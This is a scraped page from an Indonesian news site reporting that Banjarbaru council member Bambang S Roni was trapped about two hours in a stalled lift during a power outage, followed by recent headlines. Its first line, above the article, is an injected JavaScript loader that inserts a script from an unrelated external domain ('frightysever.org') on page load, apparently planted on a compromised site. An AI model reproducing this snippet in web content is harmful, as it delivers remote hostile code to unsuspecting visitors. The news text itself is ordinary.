(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Was-was Tunggu Evakuasi, Bambang Baca WA hingga Minum Air Tiga Botol


BANJARBARU, Sempat khawatir, Ketua Komisi III DPRD Banjarbaru H Bambang S Roni, mengisahkan pengalamannya terjebak hampir dua jam di lift dewan yang tiba-tiba macet. Ditemui wartawan usai terbebas dari bahaya yang mengancam jiwanya, Bambang mengaku sempat takut.

“Jujur saja, sebenarnya saya takut juga. Kemungkinannya dua. Bisa saja lift tersebut terbuka, tapi bisa juga jatuh. Nah, kalau jatuh kan bisa berakibat fatal,” ungkapnya.

Bambang mengisahkan,  tahu dirinya terjebak di dalam lif, ia pun langsung menekan tombol emergency yang ada di dalam hingga dua kali. Upaya itu mendapat respons dari petugas gedung dewan. “Pak De (panggilan Bambang S Roni di dewan, red) tunggu di dalam. Kami usahakan cari kuncinya,” kata Bambang menirukan jawaban petugas keamanan dewan.

Dicari beberapa lama, tapi kunci tidak ketemu.

“Nah disitu lah saya bingung, akhirnya saya paksa buka pintu dalam, dan alhamdulillah bisa terbuka. Dari situ akhirnya udara bisa masuk ke dalam, dan saya bisa sedikit tenang,” ujar Bambang yang sudah menjadi anggota Dewan selama beberapa periode ini.

Tak beberapa lama kemudian, datanglah petugas menyalakan listrik dengan genset. Tetapi, lift tetap tak mau jalan. Menurut petugas, hal itu terjadi karena baterai cadangan tak berfungsi. Gara-garanya pintu yang dibuka paksa sebelum baterai terisi.

Sambil menunggu pintu terbuka, berbagai hal dilakukan Bambang untuk mengisi waktu dan mengusir rasa tegang. “Saya di dalam ya menunggu saja (petugas bisa membuka pintu), sambil baca WA segala macam, minum sampai tiga batol. Termasuk juga merokok, biar gak tegang,” kisanya.

Alhamdulillah, kata Bambang, evakuasi terhadap dirinya bisa dilakukan. Dan lift tak sempat jatuh, separti yang dikhawatirkannya.

Foto : devi

Suasana menegangkan terjadi di gedung DPRD Banjarbaru, Senin (22/1) sekitar pukul 10.30 Wita. Ketua Komisi III DPRD Banjarbaru, H Bambang S Roni, terjebak dalam lift di lantai 3 saat listrik di gedung dewan tersebut padam. Selama sekitar dua jam, Bambang terperangkap dalam ruangan sempit itu tersebut sebelum akhirnya dibebaskan oleh tim penyelamat.

Mestinya, Bambang pagi itu menghadiri rapat Raperda Pengelolaan Pemakanan bersama anggota Panitia Khusus (Pansus) lainnya. Tapi gara-gara kejadian tersebut, dia tak bisa mengikuti rapat pembahasan Raperda.

Bambang sejatinya sudah datang di gedung DPRD Banjarbaru sejak pagi. Karena rapat belum dimulai, anggota dewan asal PDIP ini pun menunggu di ruang kerjanya yang berlokasi di lantai 3 sambil menyiapkan bahan rapat. Saat rapat hendak dimulai, Bambang pun menuju lift yang ada di lantai tersebut untuk turun ke lantai 2 yang menjadi lokasi rapat Pansus Raperda Pengelolaan Pemakanan.

Entah kenapa, saat itu cuma dia seorang yang menggunakan lift. Pria bertubuh tambun ini selama ini memang lebih senang menggunakan lift, dibandingkan naik turun tangga yang menghubungkan antar lantai gedung. Bambang pun lantas menekan tombol menuju lantai dua. Namun naas, selang beberapa menit setelah lift tersebut hendak turun, listrik di gedung DPRD Banjarbaru padam. Akibatnya, lift yang posisinya sudah turun sekitar 1,5 meter dari lantai tiga tersebut berhentik. Dan, Bambang pun terjebak di situ! (devi)

 

Reporter : Devi
Editor : Chell

Desy Arfianty

Recent Posts

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

3 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

6 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

6 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

21 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

22 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

1 hari ago

This website uses cookies.